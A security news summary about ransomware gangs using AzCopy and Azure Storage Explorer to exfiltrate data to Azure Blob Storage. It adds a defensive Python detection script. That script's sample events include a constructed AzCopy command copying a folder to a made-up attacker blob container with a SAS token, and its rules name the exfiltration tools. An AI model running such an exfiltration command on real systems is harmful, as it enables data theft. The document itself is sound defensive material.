September 17, 2024 at 12:16PM
Ransomware gangs including BianLian and Rhysida are increasingly using Microsoft's Azure Storage Explorer and AzCopy to exfiltrate data from breached networks into Azure Blob Storage. Getting Azure Storage Explorer running on a victim host takes extra setup work, and the fact that attackers bother shows how much weight stolen data now carries in the extortion phase. Azure is an enterprise-grade service that many companies already use, so traffic to it is unlikely to be blocked by corporate firewalls and security tools, and uploads are fast; attackers were observed running multiple instances of Azure Storage Explorer in parallel to speed up the transfer. To detect this kind of exfiltration, monitor for AzCopy execution, outbound traffic to Azure Blob Storage endpoints (hosts under blob.core.windows.net), and unusual file-copying or access patterns on critical servers; because legitimate backup and sync tools also talk to Blob Storage, those alerts need an allow-list of known clients to stay useful. For organisations that use Azure Storage Explorer themselves, enabling its 'Logout on Exit' option is recommended so that an attacker who gains access to the workstation cannot reuse an active session to steal files.
Key takeaways:
1. Ransomware gangs like BianLian and Rhysida are increasingly using Microsoft’s Azure Storage Explorer and AzCopy to steal and store data in Azure Blob storage.
2. Azure’s enterprise-grade service is often used by companies and is unlikely to be blocked by corporate firewalls and security tools, making data transfer attempts through it more likely to go undetected.
3. To detect this exfiltration, incident responders can monitor for AzCopy execution and for outbound network traffic to Azure Blob Storage endpoints, and set alerts for unusual file-copying or access patterns on critical servers.
4. Organisations that use Azure Storage Explorer should enable its 'Logout on Exit' option so the application signs out when it closes, preventing an attacker from reusing the active session for file theft.
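The detection guidance in the summary and in takeaway 3 can be turned into concrete logic. The following is an added example written for this page, not code from the original article or from Microsoft: a toy detection pass over constructed Sysmon-style event lines that flags execution of AzCopy or Storage Explorer, command lines carrying a Blob Storage URL (with a note when it includes a SAS token), outbound connections to *.blob.core.windows.net from processes outside an allow-list, and a burst of reads on a sensitive share within one minute. The event field layout, host and share names, the executable name StorageExplorer.exe, the threshold and the allow-list are all assumptions made for the example.

```python
"""Added example (not from the article): a toy detection pass that applies the
three signals described above to constructed Sysmon-style event lines:
  1. execution of AzCopy / Azure Storage Explorer,
  2. outbound connections to Azure Blob endpoints (*.blob.core.windows.net),
  3. a burst of file reads on a sensitive share within one minute.
Field layout ("kind|timestamp|host|..."), host names, share names, thresholds
and the allow-list are all assumptions made for this example.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Image names of the two tools the article names (assumed executable names).
EXFIL_IMAGES = {"azcopy.exe", "storageexplorer.exe"}
# Azure Blob Storage public endpoint suffix.
BLOB_HOST = re.compile(r"(^|\.)blob\.core\.windows\.net$", re.IGNORECASE)
# Hypothetical allow-list of processes that legitimately talk to Blob Storage
# (backup agents, sync clients); without it the network rule is too noisy.
ALLOWED_BLOB_CLIENTS = {"veeam.backup.svc.exe"}
SENSITIVE_SHARE = "\\\\fs01\\finance\\"   # hypothetical critical share
FILE_BURST_THRESHOLD = 50                  # reads per host per minute

def is_blob_host(host: str) -> bool:
    """True for <account>.blob.core.windows.net (and the bare suffix)."""
    return bool(BLOB_HOST.search(host.strip()))

def blob_urls_in(cmdline: str):
    """Yield parsed http(s) URLs in a command line that point at Blob Storage."""
    for token in cmdline.split():
        url = urlparse(token.strip("\"'"))
        if url.scheme in ("http", "https") and is_blob_host(url.hostname or ""):
            yield url

def basename(image: str) -> str:
    """Lower-cased file name of a Windows or POSIX image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyze(lines):
    """Return a list of (host, message) alerts for the given event lines."""
    alerts = []
    reads = defaultdict(int)  # (host, minute) -> count of sensitive-share reads
    for line in lines:
        kind, ts, host, rest = line.split("|", 3)
        if kind == "proc":
            image, cmdline = rest.split("|", 1)
            name = basename(image)
            if name in EXFIL_IMAGES:
                alerts.append((host, f"exfil tool executed: {name}"))
            for url in blob_urls_in(cmdline):
                # A SAS token (sig=) in the URL means the attacker brought
                # pre-authorised credentials for the destination container.
                sas = " (SAS token)" if "sig=" in url.query else ""
                alerts.append((host, f"blob URL on {name} command line: {url.hostname}{sas}"))
        elif kind == "net":
            image, dest = rest.split("|", 1)
            name = basename(image)
            if is_blob_host(dest) and name not in ALLOWED_BLOB_CLIENTS:
                alerts.append((host, f"{name} connected to {dest}"))
        elif kind == "file":
            if rest.lower().startswith(SENSITIVE_SHARE.lower()):
                reads[(host, ts[:16])] += 1   # ts[:16] is YYYY-MM-DDTHH:MM
    for (host, minute), n in reads.items():
        if n >= FILE_BURST_THRESHOLD:
            alerts.append((host, f"{n} reads under {SENSITIVE_SHARE} in minute {minute}"))
    return alerts

# Constructed sample events: one workstation staging data with AzCopy and
# Storage Explorer, one legitimate backup server, one idle workstation.
SAMPLE_EVENTS = [
    "proc|2024-09-17T12:01:05|WKS-42|C:\\Users\\svc\\Downloads\\azcopy.exe|"
    "azcopy.exe copy D:\\export "
    "\"https://exfilacct.blob.core.windows.net/c1?sv=2022-11-02&sig=abc\" --recursive",
    "proc|2024-09-17T12:01:09|WKS-42|C:\\Program Files\\Microsoft Azure Storage Explorer\\StorageExplorer.exe|StorageExplorer.exe",
    "net|2024-09-17T12:01:30|WKS-42|C:\\Users\\svc\\Downloads\\azcopy.exe|exfilacct.blob.core.windows.net",
    "net|2024-09-17T12:02:00|BKP-01|C:\\Program Files\\Veeam\\veeam.backup.svc.exe|corpbackup.blob.core.windows.net",
    "proc|2024-09-17T12:03:00|WKS-07|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt",
] + [f"file|2024-09-17T12:01:{s:02d}|WKS-42|\\\\fs01\\finance\\Q3\\doc{s}.xlsx" for s in range(60)]

if __name__ == "__main__":
    for host, msg in analyze(SAMPLE_EVENTS):
        print(f"[{host}] {msg}")
```

Run as-is, the script reports five alerts, all for WKS-42, and nothing for the backup server, because its blob traffic comes from an allow-listed client. In a real deployment the allow-list and the share path would come from asset inventory rather than constants, and the file-burst rule would be tuned per server; the point is that each of the article's three signals is cheap to express once process, network and file events are collected.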